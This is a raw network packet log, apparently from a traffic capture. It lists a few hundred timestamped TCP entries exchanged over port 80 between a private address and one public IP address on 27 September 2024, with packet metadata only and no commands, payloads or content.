Sep 27, 2024 01:28:23.683280945 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683291912 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683303118 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683314085 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683314085 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.683327913 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683330059 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.683351040 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.683376074 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.683422089 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683434010 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683445930 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683455944 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683460951 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.683468103 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683474064 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.683494091 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.683518887 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683522940 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.683532953 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683552980 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.683562994 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.683599949 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683614969 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683625937 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683635950 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683649063 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683651924 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.683651924 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.683671951 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.683700085 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.683733940 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683744907 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683756113 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683768034 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683774948 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.683780909 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683793068 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683800936 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.683818102 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.683820009 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.683845043 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.683856010 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.734313011 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.734338045 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.734355927 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.734370947 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.734385014 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.734395027 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.734400034 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.734405994 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.734417915 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.734431028 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.734431028 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.734445095 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.734467983 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769217014 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769253016 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769265890 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769268036 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769289970 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769298077 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769309044 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769318104 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769319057 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769335985 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769350052 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769362926 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769372940 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769382954 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769397020 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769397974 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769416094 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769426107 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769429922 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769440889 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769462109 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769498110 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769517899 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769530058 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769541025 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769541979 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769572973 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769596100 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769598007 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769634962 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769643068 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769654036 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769690037 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769704103 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769716024 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769731998 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769742012 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769742966 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769767046 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769768953 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769794941 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769809961 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769821882 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769838095 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769846916 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769850016 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.769875050 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769900084 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.769967079 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.770004034 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.770028114 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.770049095 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.770060062 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.770064116 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.770070076 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.770098925 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.770111084 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.770672083 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.770692110 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.770703077 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.770715952 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.770728111 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.770747900 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.770778894 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.770791054 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.770801067 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.770812035 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.770817041 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.770831108 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.770853996 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.770932913 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.770944118 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.770956039 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.770966053 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.770976067 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.770977020 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.770992041 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.770998955 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.771003962 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.771030903 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.771058083 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.771068096 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.771079063 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.771090031 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.771100044 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.771104097 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.771116972 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.771128893 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.771132946 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.771157980 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.771181107 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.771367073 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.771411896 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.771434069 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.771471977 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.771478891 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.771508932 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.771519899 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.771536112 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.771547079 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.771572113 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.771579027 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.771603107 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.771612883 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.771644115 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.773726940 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.773751020 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.773770094 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.773776054 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.773788929 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.773788929 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.773802996 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.773824930 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.773827076 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.773838997 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.773853064 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.773861885 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.773868084 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.773874998 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.773883104 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.773897886 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.773907900 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.773932934 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.773933887 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.773964882 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.773969889 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.773978949 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774000883 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774008989 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774023056 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774025917 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774039030 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774050951 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774060011 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774081945 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774081945 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774096012 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774112940 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774118900 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774135113 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774137974 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774148941 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774149895 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774178982 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774187088 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774203062 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774214983 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774240017 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774252892 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774285078 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774296045 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774307966 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774327040 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774353027 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774355888 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774363995 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774374962 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774385929 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774390936 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774420977 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774446964 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774447918 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774458885 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774481058 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774498940 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774523020 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774534941 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774564028 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774571896 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774636984 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774650097 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774661064 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.774677038 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774688959 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.774708033 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.775105000 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.775116920 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.775130033 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.775145054 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.775161982 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.775170088 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.775172949 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.775186062 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.775201082 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.775202990 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.775213957 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.775228024 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.775245905 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.775258064 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.775258064 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.775274992 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.775301933 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.775326014 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.775337934 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.775348902 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.775361061 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.775363922 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.775372028 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.775409937 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.775409937 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.822896957 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.822911978 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.822923899 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.822959900 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.822983027 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.822999001 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.823004961 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.823010921 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.823023081 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.823024988 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.823033094 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.823050976 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.823077917 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.858160019 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858186007 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858197927 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858263969 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858266115 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.858277082 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858288050 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858299971 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858314037 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858319044 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.858324051 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858346939 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.858371973 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.858395100 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858407021 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858417034 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858428955 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858432055 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.858441114 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858468056 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.858494997 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.858567953 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858578920 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858589888 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858603001 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858613968 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.858614922 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858627081 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858647108 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.858659983 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.858716011 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858757019 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.858835936 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858880043 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.858886003 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858896017 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858928919 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.858961105 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858973026 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858983994 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.858994961 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.859004974 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.859019995 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.859047890 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.859745979 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.859792948 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.859792948 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.859803915 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.859827042 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.859848022 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.859859943 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.859869957 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.859879971 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.859893084 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.859899044 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.859929085 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.859977007 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.859987974 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.859997988 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.860022068 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.860034943 CEST	49706	80	192.168.2.9	185.215.113.37
Sep 27, 2024 01:28:23.860112906 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.860122919 CEST	80	49706	185.215.113.37	192.168.2.9
Sep 27, 2024 01:28:23.860133886 CEST	80	49706	185.215.113.37	192.168.2.9
